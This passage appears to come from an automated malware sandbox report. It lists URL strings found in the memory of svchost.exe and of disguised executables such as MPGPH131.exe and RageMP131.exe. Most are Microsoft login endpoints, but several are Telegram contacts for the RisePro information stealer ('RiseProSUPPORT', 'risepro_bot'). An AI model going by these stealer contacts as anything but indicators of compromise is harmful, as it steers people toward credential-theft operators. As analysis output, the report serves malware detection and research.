                                Source: svchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srfce
                                Source: svchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                                Source: svchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                                Source: svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
                                Source: svchost.exe, 0000001E.00000003.2356389509.000001EFCE56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354605983.000001EFCE510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                                Source: svchost.exe, 0000001E.00000003.2356389509.000001EFCE56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                                Source: svchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                                Source: svchost.exe, 0000001E.00000003.2356389509.000001EFCE56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                                Source: svchost.exe, 0000001E.00000003.2356389509.000001EFCE56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                                Source: svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfr
                                Source: svchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                                Source: svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                                Source: svchost.exe, 0000001E.00000003.2356389509.000001EFCE56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE52C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356389509.000001EFCE56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                                Source: svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600UE
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269246589.000001EFCDC2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                                Source: svchost.exe, 0000001E.00000003.2356389509.000001EFCE56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                                Source: svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfe
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE52C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                                Source: svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                                Source: svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502R
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3308028724.000001EFCDD02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2477482746.000001EFCDD02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                                Source: svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806013
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                                Source: svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3308028724.000001EFCDD02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2477482746.000001EFCDD02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3308028724.000001EFCDD02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2477482746.000001EFCDD02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355752534.000001EFCE557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269246589.000001EFCDC2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE52C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354695879.000001EFCE55A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                                Source: svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp8
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2357505019.000001EFCE556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                                Source: svchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                                Source: svchost.exe, 0000001E.00000002.3325008437.000001EFCEC13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                                Source: svchost.exe, 0000001E.00000003.2354605983.000001EFCE510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                                Source: svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                                Source: svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                                Source: svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
                                Source: svchost.exe, 0000001E.00000002.3269246589.000001EFCDC2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/li
                                Source: svchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                                Source: svchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                                Source: svchost.exe, 0000001E.00000002.3308028724.000001EFCDCE1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3325406363.000001EFCEC71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                                Source: svchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                                Source: svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                                Source: svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf(
                                Source: svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf
                                Source: svchost.exe, 0000001E.00000003.2354605983.000001EFCE510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
                                Source: svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                                Source: svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                                Source: svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfL
                                Source: svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                                Source: svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                                Source: svchost.exe, 0000001E.00000003.2354605983.000001EFCE510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                                Source: svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srft
                                Source: svchost.exe, 0000001E.00000003.2354605983.000001EFCE510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                                Source: svchost.exe, 0000001E.00000003.2354605983.000001EFCE510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
                                Source: svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfr
                                Source: svchost.exe, 0000001E.00000002.3290683644.000001EFCDC9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pcss.dll
                                Source: svchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354397715.000001EFCE52C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                                Source: MPGPH131.exe, 00000014.00000003.2351242676.00000000079D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                Source: MPGPH131.exe, 00000014.00000003.2351242676.00000000079D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.(
                                Source: 2531414c80.exe, 00000008.00000002.2516925001.0000000007BDD000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000002.2511321549.000000000149E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2500776200.000000000169D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2363329164.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2539684694.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2362400081.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2539684694.00000000079D0000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2361500183.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2404856512.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001F.00000002.2450136740.000000000146E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORT
                                Source: MPGPH131.exe, 00000013.00000002.2500776200.000000000169D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORTqUTv
                                Source: MPGPH131.exe, 00000014.00000003.2363329164.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2539684694.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2362400081.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2361500183.0000000007A11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORTv=
                                Source: RageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_bot
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_bot1.132
                                Source: MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_bot:
                                Source: MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botH
                                Source: RageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botftW
                                Source: RageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botisepro_bot
                                Source: MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botisepro_botU
                                Source: MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botn
                                Source: MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2404856512.0000000001440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botrisepro
                                Source: RageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botriseproU
                                Source: RageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.tIpo
